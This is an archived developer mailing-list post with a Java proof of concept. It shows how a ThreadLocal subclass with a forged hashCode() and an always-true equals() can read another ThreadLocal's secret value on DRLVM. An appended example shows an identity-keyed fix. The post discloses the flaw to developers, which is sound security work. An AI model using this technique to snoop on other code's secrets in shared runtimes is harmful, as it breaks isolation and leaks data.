harmony-dev mailing list archives

From Tim Ellison <t.p.elli...@gmail.com>
Subject Re: [drlvm][kernel_classes] ThreadLocal vulnerability
Date Sat, 18 Nov 2006 23:05:56 GMT
FYI: For fun, here's a simple program that illustrates the problem.  On
DRLVM this can find the victim's TLV value.  The regression test is much
shorter.

public class SimpleTLTest {

    public static void main(String[] args) {
        String secretValue = "My secret value";

        // Assume 'victim' is set by some code on this thread
        ThreadLocal<String> victim = new ThreadLocal<String>() {
            public int hashCode() {
                // Imagine this is any int, including the identityHashCode
                return 2;
            }
        };
        victim.set(secretValue);

        // arbitrary code in here runs on current thread.

        // evilPhisher tries to find the value on the same thread
        // without a reference to the threadlocal instance.
        ThreadLocal<Object> evilPhisher = new ThreadLocal<Object>() {
            int guessedHashCode = 0;
            // One get() results in a number of hashCode() requests.
            int timesAskedForCurrent = 0;

            public int hashCode() {
                // Phishing for a hash collision with victim
                if (timesAskedForCurrent++ == 4) {
                    timesAskedForCurrent = 0;
                    guessedHashCode++;
                }
                return guessedHashCode;
            }

            public boolean equals(Object arg) {
                // I could easily reflect on arg here to snoop too
                return true; // I'm lying, and always saying true
            }
        };

        /* This is how the phishing is performed.
         * To make the test viable, I'm artificially using knowledge that
         * the victim's hashCode is small, and only making ten get() attempts.
         */
        for (int i = 0; i < 10; i++) {
            Object guessedValue = evilPhisher.get();
            if (guessedValue == secretValue) {
                System.out.println("Managed to guess victim's ThreadLocal value");
            }
        }
    }
}

-- 

Tim Ellison (t.p.ellison@gmail.com)
IBM Java technology centre, UK.
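As an added illustration, not code from the message above or from DRLVM, of where such a lookup goes wrong and one way to close it: the same lying key is tried against a hypothetical per-thread store that consults the key's own hashCode()/equals() and against one that keys on object identity. The store and both variants are assumptions for the example, not Harmony's ThreadLocal implementation.

```java
import java.util.HashMap;
import java.util.IdentityHashMap;
import java.util.Map;

// Hypothetical per-thread value store keyed by the ThreadLocal object.
// The only difference between the two variants is the map type, which
// decides whether a subclass's overridden hashCode()/equals() take part
// in the lookup.
public class IdentityKeyedStore {

    // Weak shape: HashMap calls key.hashCode() and then key.equals(entryKey),
    // so a key that lies about both can be matched to another key's entry.
    static final Map<ThreadLocal<?>, Object> byHashAndEquals =
            new HashMap<ThreadLocal<?>, Object>();

    // Hardened shape: IdentityHashMap uses System.identityHashCode and ==,
    // neither of which a subclass can override.
    static final Map<ThreadLocal<?>, Object> byIdentity =
            new IdentityHashMap<ThreadLocal<?>, Object>();

    public static void main(String[] args) {
        ThreadLocal<String> victim = new ThreadLocal<String>() {
            public int hashCode() { return 2; }
        };
        String secret = "My secret value";
        byHashAndEquals.put(victim, secret);
        byIdentity.put(victim, secret);

        // Lying key: same hash as the victim and equals() that always says yes.
        ThreadLocal<Object> liar = new ThreadLocal<Object>() {
            public int hashCode() { return 2; }
            public boolean equals(Object o) { return true; }
        };

        // hashCode()/equals() lookup: the collision plus equals()==true
        // hands back the victim's value to a key that never stored it.
        System.out.println("HashMap lookup with lying key: "
                + byHashAndEquals.get(liar));

        // Identity lookup ignores both overrides, so nothing is found.
        System.out.println("IdentityHashMap lookup with lying key: "
                + byIdentity.get(liar));
    }
}
```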
